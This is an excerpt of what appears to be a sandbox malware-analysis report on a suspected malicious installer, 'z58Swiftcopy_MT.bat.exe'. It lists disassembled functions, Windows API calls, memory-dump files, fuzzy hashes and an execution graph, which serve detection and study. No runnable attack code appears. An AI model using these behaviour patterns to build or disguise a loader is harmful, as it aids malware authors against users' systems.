                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                      • Opcode ID: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                                                                                                                                                                                                                                      • Instruction ID: c2e14b81eed27f6ef80c9e529a4f942fbf68e082709ee8d6c9922b6f58a3139d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cef517e8acf1b00021c4c6b190ff76a2e6404192bdc33fc547d340bfee77a79a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7801B131900608AFEF218F41DD80F6B3676EB84750F244137FA00BA1D1C7799D929E6D
                                                                                                                                                                                                                                      Function 00405F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,Call,00420510,?,?,?,00000002,Call,?,004061C4,80000002), ref: 00405FC6
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,004061C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,?,00420510), ref: 00405FD1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseQueryValue
                                                                                                                                                                                                                                      • String ID: Call
                                                                                                                                                                                                                                      • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                                      • Opcode ID: 89fd80a38215459d753601d22b2c149a63a94ab0799c11bc238657d83ab6ff10
                                                                                                                                                                                                                                      • Instruction ID: 18c902175c261954d743b78889848fcc164f2ce977d73a6ea322bbd2e465ffc2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 89fd80a38215459d753601d22b2c149a63a94ab0799c11bc238657d83ab6ff10
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CD01BC7250020AABDF228F20CC09FDB3FA8EF54364F00403AFA05A2190D278CA14DFA8
                                                                                                                                                                                                                                      Function 00405738 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422538,Error launching installer), ref: 00405761
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040576E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Error launching installer, xrefs: 0040574B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                      • String ID: Error launching installer
                                                                                                                                                                                                                                      • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                      • Opcode ID: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                                                                                                                                                                                                      • Instruction ID: 69b2a91025ee82e0f17d0b644fa8ba69f8cb79a6280e59e5c1840fb2568b3eab
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8239ab618066ac962b74623b1050f3e7ebc47b2e843eb3c877c6a70e342349f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00E046F0600209BFEB009F60EE49F7BBBACEB10704F808421BD00F2190D6B898448A78
                                                                                                                                                                                                                                      Function 00403854 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,762D3410,00000000,762D2EE0,0040382B,C:\Users\user\AppData\Local\Temp\,0040362E,?,?,00000006,00000008,0000000A), ref: 0040386E
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(006F7A48), ref: 00403875
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                      • String ID: Hzo
                                                                                                                                                                                                                                      • API String ID: 1100898210-2299914463
                                                                                                                                                                                                                                      • Opcode ID: bf20d2945bb5ef82aea882dca47bf7a800ed57bbe34a1365a93ea0a8c88c69c9
                                                                                                                                                                                                                                      • Instruction ID: 5a7e105abd1ff501ddbafdab51ff1ddcb88a66ee3eeb0d8e06bf853bef0fe42f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf20d2945bb5ef82aea882dca47bf7a800ed57bbe34a1365a93ea0a8c88c69c9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9AE08C3380112097C6212F25EA0475AB7A86F44B22F1180BAFC807B2608B741C428AC8
                                                                                                                                                                                                                                      Function 00405A78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405A7E
                                                                                                                                                                                                                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E04,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405A8C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                                      • API String ID: 2709904686-3370423016
                                                                                                                                                                                                                                      • Opcode ID: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                                                                                                                                                      • Instruction ID: 40098e637bf6d505f922d12736ff559178fc12fa7d0ee67292c12de19d06dc46
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2cb5c10c54eab45be364f275a3e0fd7f40b7dc80b72c69925d8ec85e0f8a492
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6ED0A7729089702EF30393108C00B9F6A88CF16341F090062E480A7191C67C0C424BAD
                                                                                                                                                                                                                                      Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                                      • Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                                                                      • Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
                                                                                                                                                                                                                                      Function 00405B97 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BBF
                                                                                                                                                                                                                                      • CharNextA.USER32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD0
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 190613189-0
                                                                                                                                                                                                                                      • Opcode ID: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                                                                                                                                                                                                      • Instruction ID: c0798baac460c4c161baa60e5c3960505173fe7825234d44b9ee5cd82a8c1779
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b856c8c7d4e4c10c4bedc5fcb7273c416007e4233098a198b9b1013c6992f0c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29F06235105918AFCB02DFA9DD40D9EBBB8EF46350B2540B9F840FB211D674FE01ABA9

                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                      Execution Coverage:1.9%
                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                      Signature Coverage:1.3%
                                                                                                                                                                                                                                      Total number of Nodes:1648
                                                                                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                                                                                      execution_graph 6135 33a7c7a7 6136 33a7c7be 6135->6136 6140 33a7c80d 6135->6140 6136->6140 6144 33a7c7e6 GetModuleHandleA 6136->6144 6137 33a7c835 GetModuleHandleA 6137->6140 6138 33a7c872 6140->6137 6140->6138 6142 33a7c85f GetProcAddress 6140->6142 6142->6140 6145 33a7c7ef 6144->6145 6151 33a7c80d 6144->6151 6153 33a7c803 GetProcAddress 6145->6153 6147 33a7c835 GetModuleHandleA 6147->6151 6148 33a7c872 6151->6147 6151->6148 6152 33a7c85f GetProcAddress 6151->6152 6152->6151 6157 33a7c80d 6153->6157 6154 33a7c835 GetModuleHandleA 6154->6157 6155 33a7c872 6156 33a7c85f GetProcAddress 6156->6157 6157->6154 6157->6155 6157->6156 6158 33a721a1 6161 33a72418 6158->6161 6162 33a72420 6161->6162 6165 33a747f5 6162->6165 6164 33a721bc 6166 33a74804 6165->6166 6167 33a74808 6165->6167 6166->6164 6170 33a74815 6167->6170 6171 33a75b7a 20 API calls 6170->6171 6174 33a7482c 6171->6174 6172 33a72ada 5 API calls 6173 33a74811 6172->6173 6173->6164 6174->6172 6982 33a79d61 6983 33a79d81 6982->6983 6986 33a79db8 6983->6986 6985 33a79dab 6987 33a79dbf 6986->6987 6988 33a79e20 6987->6988 6992 33a79ddf 6987->6992 6990 33a7a90e 6988->6990 6995 33a7aa17 6988->6995 6990->6985 6992->6990 6993 33a7aa17 21 API calls 6992->6993 6994 33a7a93e 6993->6994 6994->6985 6996 33a7aa20 6995->6996 6999 33a7b19b 6996->6999 7000 33a7b1da 6999->7000 7005 33a7b25c 7000->7005 7009 33a7b59e 7000->7009 7002 33a7b286 7004 33a7b292 7002->7004 7016 33a7b8b2 7002->7016 7007 33a72ada 5 API calls 7004->7007 7005->7002 7012 33a778a3 7005->7012 7008 33a79e6e 7007->7008 7008->6985 7023 33a7b5c1 7009->7023 7013 33a778cb 7012->7013 7014 33a72ada 5 API calls 7013->7014 7015 33a778e8 7014->7015 7015->7002 7017 33a7b8d4 7016->7017 7018 33a7b8bf 7016->7018 7020 33a76368 20 API calls 7017->7020 7019 33a7b8d9 7018->7019 7021 33a76368 20 API calls 7018->7021 7019->7004 7020->7019 7022 33a7b8cc 7021->7022 7022->7004 7024 33a7b5ec 7023->7024 7025 33a7b7e5 RaiseException 7024->7025 7026 33a7b5bc 7025->7026 7026->7005 6175 33a781a0 6176 33a781d9 6175->6176 6177 33a781dd 6176->6177 6188 33a78205 6176->6188 6178 33a76368 20 API calls 6177->6178 6179 33a781e2 6178->6179 6189 33a762ac 6179->6189 6180 33a78529 6182 33a72ada 5 API calls 6180->6182 6184 33a78536 6182->6184 6185 33a72ada 5 API calls 6186 33a781f9 6185->6186 6188->6180 6192 33a780c0 6188->6192 6196 33a76231 6189->6196 6191 33a762b8 6191->6185 6195 33a780db 6192->6195 6193 33a72ada 5 API calls 6194 33a78152 6193->6194 6194->6188 6195->6193 6197 33a75b7a 20 API calls 6196->6197 6198 33a76247 6197->6198 6199 33a76255 6198->6199 6200 33a762a6 6198->6200 6205 33a72ada 5 API calls 6199->6205 6207 33a762bc IsProcessorFeaturePresent 6200->6207 6202 33a762ab 6203 33a76231 26 API calls 6202->6203 6204 33a762b8 6203->6204 6204->6191 6206 33a7627c 6205->6206 6206->6191 6208 33a762c7 6207->6208 6211 33a760e2 6208->6211 6212 33a760fe 6211->6212 6213 33a7612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6212->6213 6216 33a761fb 6213->6216 6214 33a72ada 5 API calls 6215 33a76219 GetCurrentProcess TerminateProcess 6214->6215 6215->6202 6216->6214 6268 33a7a1e0 6271 33a7a1fe 6268->6271 6270 33a7a1f6 6275 33a7a203 6271->6275 6273 33a7a298 6273->6270 6275->6273 6276 33a7aa53 6275->6276 6277 33a7aa70 RtlDecodePointer 6276->6277 6279 33a7aa80 6276->6279 6277->6279 6278 33a7ab02 6281 33a72ada 5 API calls 6278->6281 6279->6278 6280 33a7ab0d 6279->6280 6283 33a7aab7 6279->6283 6280->6278 6284 33a76368 20 API calls 6280->6284 6282 33a7a42f 6281->6282 6282->6270 6283->6278 6285 33a76368 20 API calls 6283->6285 6284->6278 6285->6278 7874 33a77260 GetStartupInfoW 7875 33a77286 7874->7875 7876 33a77318 7874->7876 7875->7876 7877 33a78be3 27 API calls 7875->7877 7878 33a772af 7877->7878 7878->7876 7879 33a772dd GetFileType 7878->7879 7879->7878 7880 33a7506f 7881 33a75081 7880->7881 7882 33a75087 7880->7882 7883 33a75000 20 API calls 7881->7883 7883->7882 7442 33a760ac 7443 33a760dd 7442->7443 7445 33a760b7 7442->7445 7444 33a760c7 FreeLibrary 7444->7445 7445->7443 7445->7444 7535 33a7742b 7536 33a77430 7535->7536 7537 33a77453 7536->7537 7539 33a78bae 7536->7539 7540 33a78bbb 7539->7540 7544 33a78bdd 7539->7544 7541 33a78bd7 7540->7541 7542 33a78bc9 RtlDeleteCriticalSection 7540->7542 7543 33a7571e 20 API calls 7541->7543 7542->7541 7542->7542 7543->7544 7544->7536 7884 33a7ac6b 7885 33a7ac84 7884->7885 7886 33a7acad 7885->7886 7888 33a7b2f0 7885->7888 7889 33a7b329 7888->7889 7890 33a7b5c1 RaiseException 7889->7890 7892 33a7b350 7889->7892 7890->7892 7891 33a7b393 7894 33a7b8b2 20 API calls 7891->7894 7892->7891 7893 33a7b36e 7892->7893 7899 33a7b8e1 7893->7899 7896 33a7b38e 7894->7896 7897 33a72ada 5 API calls 7896->7897 7898 33a7b3b7 7897->7898 7898->7886 7900 33a7b8f0 7899->7900 7901 33a7b964 7900->7901 7902 33a7b90f 7900->7902 7903 33a7b8b2 20 API calls 7901->7903 7904 33a778a3 5 API calls 7902->7904 7907 33a7b95d 7903->7907 7905 33a7b950 7904->7905 7906 33a7b8b2 20 API calls 7905->7906 7905->7907 7906->7907 7907->7896 7446 33a73eb3 7449 33a75411 7446->7449 7450 33a7541d 7449->7450 7451 33a75af6 38 API calls 7450->7451 7454 33a75422 7451->7454 7452 33a755a8 38 API calls 7453 33a7544c 7452->7453 7454->7452 7908 33a79e71 7909 33a79e95 7908->7909 7910 33a79eae 7909->7910 7911 33a7ac6b 7909->7911 7912 33a7aa53 21 API calls 7910->7912 7913 33a79ef8 7910->7913 7914 33a7b2f0 21 API calls 7911->7914 7915 33a7acad 7911->7915 7912->7913 7914->7915 6286 33a763f0 6287 33a76416 6286->6287 6288 33a76400 6286->6288 6298 33a76561 6287->6298 6299 33a76480 6287->6299 6305 33a76580 6287->6305 6289 33a76368 20 API calls 6288->6289 6290 33a76405 6289->6290 6291 33a762ac 26 API calls 6290->6291 6293 33a7640f 6291->6293 6295 33a764ee 6297 33a7571e 20 API calls 6295->6297 6296 33a764e5 6296->6295 6302 33a76573 6296->6302 6322 33a785eb 6296->6322 6297->6298 6331 33a7679a 6298->6331 6316 33a74e76 6299->6316 6303 33a762bc 11 API calls 6302->6303 6304 33a7657f 6303->6304 6306 33a7658c 6305->6306 6306->6306 6307 33a7637b 20 API calls 6306->6307 6308 33a765ba 6307->6308 6309 33a785eb 26 API calls 6308->6309 6310 33a765e6 6309->6310 6311 33a762bc 11 API calls 6310->6311 6312 33a76615 6311->6312 6313 33a766b6 FindFirstFileExA 6312->6313 6314 33a76705 6313->6314 6315 33a76580 26 API calls 6314->6315 6317 33a74e8b 6316->6317 6318 33a74e87 6316->6318 6317->6318 6319 33a7637b 20 API calls 6317->6319 6318->6296 6320 33a74eb9 6319->6320 6321 33a7571e 20 API calls 6320->6321 6321->6318 6326 33a7853a 6322->6326 6323 33a7854f 6324 33a76368 20 API calls 6323->6324 6325 33a78554 6323->6325 6327 33a7857a 6324->6327 6325->6296 6326->6323 6326->6325 6329 33a7858b 6326->6329 6328 33a762ac 26 API calls 6327->6328 6328->6325 6329->6325 6330 33a76368 20 API calls 6329->6330 6330->6327 6332 33a767a4 6331->6332 6333 33a767b4 6332->6333 6334 33a7571e 20 API calls 6332->6334 6335 33a7571e 20 API calls 6333->6335 6334->6332 6336 33a767bb 6335->6336 6336->6293 7027 33a73370 7038 33a73330 7027->7038 7039 33a73342 7038->7039 7040 33a7334f 7038->7040 7041 33a72ada 5 API calls 7039->7041 7041->7040 7545 33a75630 7546 33a7563b 7545->7546 7547 33a75eb7 11 API calls 7546->7547 7548 33a75664 7546->7548 7549 33a75660 7546->7549 7547->7546 7551 33a75688 7548->7551 7552 33a756b4 7551->7552 7553 33a75695 7551->7553 7552->7549 7554 33a7569f RtlDeleteCriticalSection 7553->7554 7554->7552 7554->7554 6217 33a767bf 6222 33a767f4 6217->6222 6220 33a7571e 20 API calls 6221 33a767db 6220->6221 6223 33a76806 6222->6223 6226 33a767cd 6222->6226 6224 33a7680b 6223->6224 6227 33a76836 6223->6227 6225 33a7637b 20 API calls 6224->6225 6228 33a76814 6225->6228 6226->6220 6226->6221 6227->6226 6233 33a771d6 6227->6233 6230 33a7571e 20 API calls 6228->6230 6230->6226 6231 33a76851 6232 33a7571e 20 API calls 6231->6232 6232->6226 6234 33a771e1 6233->6234 6235 33a77209 6234->6235 6236 33a771fa 6234->6236 6237 33a77218 6235->6237 6242 33a78a98 6235->6242 6238 33a76368 20 API calls 6236->6238 6249 33a78acb 6237->6249 6241 33a771ff 6238->6241 6241->6231 6243 33a78aa3 6242->6243 6244 33a78ab8 RtlSizeHeap 6242->6244 6245 33a76368 20 API calls 6243->6245 6244->6237 6246 33a78aa8 6245->6246 6247 33a762ac 26 API calls 6246->6247 6248 33a78ab3 6247->6248 6248->6237 6250 33a78ae3 6249->6250 6251 33a78ad8 6249->6251 6253 33a78aeb 6250->6253 6259 33a78af4 6250->6259 6261 33a756d0 6251->6261 6254 33a7571e 20 API calls 6253->6254 6257 33a78ae0 6254->6257 6255 33a78b1e RtlReAllocateHeap 6255->6257 6255->6259 6256 33a78af9 6258 33a76368 20 API calls 6256->6258 6257->6241 6258->6257 6259->6255 6259->6256 6260 33a7474f 7 API calls 6259->6260 6260->6259 6262 33a7570e 6261->6262 6267 33a756de 6261->6267 6264 33a76368 20 API calls 6262->6264 6263 33a756f9 RtlAllocateHeap 6265 33a7570c 6263->6265 6263->6267 6264->6265 6265->6257 6266 33a7474f 7 API calls 6266->6267 6267->6262 6267->6263 6267->6266 6337 33a75bff 6345 33a75d5c 6337->6345 6340 33a75c13 6341 33a75b7a 20 API calls 6342 33a75c1b 6341->6342 6343 33a75c28 6342->6343 6352 33a75c2b 6342->6352 6346 33a75c45 5 API calls 6345->6346 6347 33a75d83 6346->6347 6348 33a75d9b TlsAlloc 6347->6348 6349 33a75d8c 6347->6349 6348->6349 6350 33a72ada 5 API calls 6349->6350 6351 33a75c09 6350->6351 6351->6340 